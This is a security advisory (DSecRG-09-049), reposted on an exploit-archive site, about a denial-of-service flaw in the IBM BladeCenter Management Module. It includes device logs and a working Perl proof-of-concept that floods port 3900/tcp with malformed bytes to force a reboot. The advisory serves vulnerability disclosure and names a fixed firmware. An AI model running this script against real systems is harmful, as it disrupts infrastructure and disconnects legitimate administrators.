首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM BladeCenter Management Module - DoS vulnerability
来源:http://dsecrg.com 作者:Sintsov 发布时间:2010-04-16  

[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability
Source: http://www.dsecrg.com/pages/vul/show.php?id=149

This device can be remotely rebooted by sending a malformed TCP packets


Digital Security Research Group [DSecRG] Advisory #DSECRG-09-049


Application: IBM BladeCenter Managmet Module
Versions Affected: before BPET50G
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: DoS
Exploits: YES
Reported: 24.07.2009
Vendor response: 26.07.2009
Date of Public Advisory: 15.04.2010
Solution: YES
Author: Alexey Sintsov
of Digital Security Research Group [DSecRG]


Description
***********

The BladeCenter management module is a hot-swappable hardware device plugged into the BladeCenter
chassis management bay. The management module functions as a system-management processor (service processor)
and keyboard, video, and mouse (KVM) multiplexor for blade servers. This device can be remotely rebooted.

Details
*******

Attacker can reset management module by sending about five or ten malformed packets on remote presence port (3900/tcp). All legal
users, who use management module and management network will be disconnected.


Network log:

Jul 6 16:16:48 212.X.X.X NOTICE mgmt: Port MGT1 DISABLED and MGT2 ENABLED because Management Module 2 is active
Jul 6 16:16:49 212.X.X.X ALERT system: link down on port MGT1
Jul 6 16:16:51 212.X.X.X NOTICE system: link up on port MGT2
Jul 6 16:17:18 212.X.X.X NOTICE mgmt: Management via all ports is DISABLED thru I2C Control Register
Jul 6 16:17:20 212.X.X.X NOTICE mgmt: New Management IP Address 192.168.Y.Z configured
Jul 6 16:17:23 212.X.X.X NOTICE mgmt: Management via all ports is ENABLED thru I2C Control Register

BladeCenter log:

9 I SERVPROC 07/06/09, 16:17:19 (SN#YK31337BR11L) Management Module in bay 1 is standby.
10 I SERVPROC 07/06/09, 16:16:54 (SN#YK31337BR11L) Management module network initialization complete
11 I SERVPROC 07/06/09, 16:16:51 (SN#YK31337BR11L) ENET Hostname=BladeMM, IP=192.168.Y.Y, GW=0.0.0.0, Mask=255.255.255.0.
12 I SERVPROC 07/06/09, 16:16:50 (SN#YK31337BR11L) Management Module in bay 2 is primary.
13 E SERVPROC 07/06/09, 16:16:45 AMM reset due to watchdog timeout


Proof of Concept:
*******************

#!/usr/bin/perl
#
# BladeCenter AMM DoS
# by Alexey Sintsov
# Digital Security Research Group
#
# [http://dsecrg.com]
#

use Socket;

$target='192.168.50.61';

for ($i=1;$i<=20;$i++)
{
socket(SERVER, AF_INET, SOCK_STREAM, getprotobyname('tcp'));
$trash="\xf1"x17;
$target_ = inet_aton($target);
$paddr=sockaddr_in(3900,$target_);


sleep(2);
if (connect(SERVER, $paddr))
{
recv(SERVER,$buf,20,0);
send(SERVER,$trash,1);
close(SERVER);
print "$i - fire!\n";
}
else
{
print "$i - refused!\n";
}
}
print "\nDone\n";

Solution
********

The issue has been fixed in AMM firmware version bpet50g and later.

Refernces
*********

http://dsecrg.com/pages/vul/show.php?id=149
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5083945&brandind=5000020

About
*****

Digital Security is leading IT security company in Russia,
providing information security consulting, audit and penetration
testing services, risk analysis and ISMS-related services and
certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.
Digital Security Research Group focuses on web application and database
security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Magneto Net Resource ActiveX v
·MS10-006 SMB client-side bug p
·Magneto Net Resource ActiveX v
·phpBB modified by Przemo <= 1.
·Camiro-CMS_beta-0.1 (fckeditor
·Oracle Financials R12 SQL inje
·linux/x86 - execve("/bin/sh",
·FreeBSD 6.4 root shell exploit
·Windows ANI LoadAniIcon() Chun
·Winamp 5.572 whatsnew.txt SEH
·Sun Java Web Start Plugin Comm
·Archive Searcher .zip Stack Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved